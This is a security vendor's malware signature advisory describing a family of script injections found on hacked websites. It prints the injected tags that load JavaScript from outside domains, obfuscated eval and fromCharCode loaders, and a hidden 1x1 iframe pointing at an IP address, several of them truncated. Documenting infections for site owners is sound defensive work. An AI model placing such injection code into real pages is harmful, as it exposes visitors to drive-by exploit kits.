SiteCheck Signatures


malware-injection-jtoolsmini-js

We have been tracking the sidename.js and cssminibar family of malware for a while, and it has lately changed (mutated) again to use the jtoolsmini.js file instead (still attempting to compromise browsers in the same way, with the Blackhole exploit kit).

 
This is how the malware looks in a hacked site:

 


<script type="text/javascript" src="http://przedmiotyszkolne.pl/jtoolsmini.js"></script>;

This does the same thing as always and loads the following malicious code into the site:

 


<script>el=document.createElement("div");el.innerHTML="ReferenceErr";el.appendChild(document.createTextNode("l"));try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar="3g[{wNaBf,iCv7t2eln}Tdyp4A..
ar2="R208c0c..e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="208";s="";pos=0;i=0;while(i<607){e(‘po’.concat(‘s+=par’,'seInt(k’,'.rep’,'lace("R’,
‘eferen’,'","0a’,'sd"))+’,'ar2[','i]/’,’4′));e(‘s+=ar.substr(pos,1)’);i++;}

If you are seeing this on your own web site, it means the site is hacked and you need to fix it as soon as possible to protect your users. This type of malware infects any type of web site (osCommerce, WordPress, Joomla and many others). Lately, however (especially with jtoolsmini.js), the infection seems to be happening via stolen FTP credentials.

 
Sucuri identifies this type of web-based malware as: http://sucuri.net/malware/malware-entry-mwiframehd203 (since we detect the malicious iframe being generated).

 
Our support team can clean it up for you if you are infected. Sign up with us here: http://sucuri.net/signup and we will get it sorted out pretty quickly.

 
If you have any questions, let us know (support@sucuri.net).

 
Update:

We are also seeing the iframe injection performed with the following types of scripts:


<script>d='function  $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r&#46offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); &#46sxml2 X1 A&#46icrosoft X2 -z=null}}if(!  z Ztypeof  M!="undefined" -z : M ]+ E= 4}} Uc > -t[ $o [>,false) Uv >, =vars Z 4== =vars A=  /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a&#46trim _$f Z"qabcdef"&#46indexOf( $o&#46substr(0,1))>=0){ H $rs So 6'q') 8'') 6'v') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k =  $rs 8

document&#46write('<iframe frameborder=0 src="http://65. 75 &#46 148 &#46 44/Home/index&#46 php" width=1 height=1 scrolling=no></iframe>')

<script>var s,g=2,aa=document&#46createTextNode("harCode");if(0===Math&#46cos(Math&#46PI)){s=String["fr"+"omC"+aa&#46nodeValue];}eval(s(7+g,7+g,103+g,100+g,30+g,38+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,39+g,121+g,7+g,7+g,7+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,57+g,7+g,7+g,123+g,30+g,99+g,106+g,113+g,99+g,30+g,121+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,117+g,112+g,103+g,114+g,99+g,38+g,32+g,58+g,103+g,100+g,112+g,95+g,107+g,99+g,30+g,113+g,112+g,97+g,59+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,110+g,115+g,106+g,110+g,103+g,97+g,44+g,97+g,109+g,107+g,45+g,97+g,109+g,106+g,45+g,97+g,102+g,105+g,44+g,110+g,102+g,110+g,61+g,114+g,102+g,112+g,59+g,97+g,48+g,48+g,95+g,54+g,49+g,46+g,50+g,53+g,55+g,46+g,46+g,100+g,51+g,96+g,50+g,37+g,30+g,117+g,103+g,98+g,114+g,102+g,59+g,37+g,47+g,46+g,37+g,30+g,102+g,9

<script type="text/javascript" src="http://pizzadomiciliu.ro/text0"></script> <html>;

<!-- ad --><script language='JavaScript' src='http://abseconbluedevils.org/dfsf323233.js'></script><!-- /ad -->;